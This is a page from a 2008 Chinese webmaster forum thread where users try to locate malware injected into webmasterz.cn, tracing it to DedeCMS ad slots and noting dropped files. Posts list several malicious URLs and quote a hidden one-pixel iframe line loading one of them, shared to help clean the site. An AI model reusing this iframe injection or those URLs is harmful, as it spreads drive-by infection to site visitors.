设为首页收藏本站
开启辅助访问 切换到宽版

EEfaq论坛-赚客自留地

 找回密码
 免费注册
EEfaq论坛-赚客自留地»论坛主页 General Discussion 赚客大家谈 webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到? ...
12
返回列表 发新帖
楼主: 静水流深

webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?

[复制链接]
卡丁车
发表于 2008-1-9 21:39:03 | 显示全部楼层
..不信邪....跑上去一看...嗷嗷卡的说....
回复 支持 反对

使用道具 举报

101300
发表于 2008-1-10 00:09:56 | 显示全部楼层
没有的事情...
回复 支持 反对

使用道具 举报

我爱格格
发表于 2008-1-10 09:28:26 | 显示全部楼层
贵网出现的这种arp攻击,会影响一些网速,他的模式是这样的:按照常理,服务器出外网应该走网关出去,但是由于机房内有人中了arp病毒,进行arp攻击以后,他就会劫持网关,即把自己虚拟成网关的mac,然后,贵网的服务器这时就不会从网关出去,而是通过那台中毒的机器,然后再通过网关出去
回复 支持 反对

使用道具 举报

我爱格格
发表于 2008-1-10 09:30:46 | 显示全部楼层
个人比较喜欢用antiarp
http://www.antiarp.com/download.htm
回复 支持 反对

使用道具 举报

loveams
发表于 2008-1-10 10:31:09 | 显示全部楼层
唉,几天没上了.
我那天上去第一次发现有毒  .. 过了个把小时 我想去看看到底哪被挂了马.看了代码没有.
发现卡巴没有报了.   
不过页面嗷嗷的卡.
偶也不知原因.
用微点查
貌似多了个服务.
c:/windows/temp/****.exe
不知各位有没有这个现像.
我的系统是当天刚装好的.
回复 支持 反对

使用道具 举报

xiaoqiu
发表于 2008-1-10 11:32:25 | 显示全部楼层
没有这种情况啊
回复 支持 反对

使用道具 举报

上帝
发表于 2008-1-10 12:24:32 | 显示全部楼层
http://www.985676.cn/encrypt/mm.htm
http://ppp.749571.com/dm/rr.htm
http://ppp.749571.com/dm/rl.htm

这是我抓到的几个,还有几个没有记下来
我冒着机器中毒的危险记下来的~

[ 本帖最后由 上帝 于 2008-1-10 12:26 编辑 ]

评分

参与人数 1 +5 收起 理由
le19754 + 5 原创内容

查看全部评分

回复 支持 反对

使用道具 举报

le19754
发表于 2008-1-10 12:28:28 | 显示全部楼层
原帖由 上帝 于 2008-1-10 12:24 发表

                               
登录/注册后可看大图

http://www.985676.cn/encrypt/mm.htm
http://ppp.749571.com/dm/rr.htm
http://ppp.749571.com/dm/rl.htm

这是我抓到的几个,还有几个没有记下来
我冒着机器中毒的危险记下来的~


干掉耶稣,我就是上帝!
你还有什么好怕的。
回复 支持 反对

使用道具 举报

上帝
发表于 2008-1-10 16:35:24 | 显示全部楼层
楼上的,谢谢咯~~~
回复 支持 反对

使用道具 举报

freelzyr
发表于 2008-1-10 16:47:23 | 显示全部楼层
进dede后台
检查 ad_js.php?aid=1  
ad_js.php?aid=2
ad_js.php?aid=3
ad_js.php?aid=4

这几个广告 里面的代码
在这几个 掉茅厕位 里面   含有 木马的 代码
回复 支持 反对

使用道具 举报

上帝
发表于 2008-1-10 16:50:35 | 显示全部楼层
请老大仔细的查查吧,刚又发现了几个,全是免杀的~~一个劲的往外蹦,但是我的卡卡即不报~~
http://ppp.749571.com/dm/test.htm
http://www.985676.cn/encrypt/mm.htm
这两个是免杀的,还有几个没记下来,
这挂马的兔崽子有一手,隐藏的很好啊~~一般人都看不出来~
回复 支持 反对

使用道具 举报

sby2000
发表于 2008-1-10 17:01:37 | 显示全部楼层
会在C盘下产生 CRESS1.EXE
然后增加IE的BHO的木马 还释放驱动
回复 支持 反对

使用道具 举报

sby2000
发表于 2008-1-10 17:34:02 | 显示全部楼层
昏 他藏得好隐秘  找到了 放毒得地方了

iframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
然后再这个地址转到ppp.749571.co m/dm/test.htm
为了跟踪这个病毒 自己失误的。。。。哎。修复中ing。。。。
静水赶快清理了吧
回复 支持 反对

使用道具 举报

firstsee2008
发表于 2008-1-10 18:00:24 | 显示全部楼层
原帖由 20082008 于 2008-1-9 16:33 发表

                               
登录/注册后可看大图

没装REAL就没事,好在我重新装的系统:

说的没错
回复 支持 反对

使用道具 举报

静水流深
 楼主| 发表于 2008-1-11 02:27:32 | 显示全部楼层
原帖由 freelzyr 于 2008-1-10 16:47 发表

                               
登录/注册后可看大图

进dede后台
检查 ad_js.php?aid=1  
ad_js.php?aid=2
ad_js.php?aid=3
ad_js.php?aid=4

这几个广告 里面的代码
在这几个 掉茅厕位 里面   含有 木马的 代码


这个检查了没有的
回复 支持 反对

使用道具 举报

上帝
发表于 2008-1-11 09:09:11 | 显示全部楼层
原帖由 静水流深 于 2008-1-11 02:27 发表

                               
登录/注册后可看大图



这个检查了没有的



我看过了,有挂马的代码,代码已经在你的另一个贴子里贴出来了
回复 支持 反对

使用道具 举报

freelzyr
发表于 2008-1-11 12:44:57 | 显示全部楼层
原帖由 静水流深 于 2008-1-11 02:27 发表

                               
登录/注册后可看大图



这个检查了没有的

木马就是在这里里啊
在后台的掉茅厕位设置那
回复 支持 反对

使用道具 举报

loveams
发表于 2008-1-30 10:38:22 | 显示全部楼层
现在明了.
有人收流量做ppp.749571.co m的..
最近被挂马的话. 都改成js了. 不用iframe了
回复 支持 反对

使用道具 举报

kick
发表于 2008-1-30 11:53:15 | 显示全部楼层
菜鸟,怕怕,不敢看,啥时好了说一声,我再去看风景
回复 支持 反对

使用道具 举报

12
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 免费注册

本版积分规则

QQ|联系我们|Archiver|手机版|小黑屋|EEfaq论坛

GMT+8, 2025-4-19 09:03

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表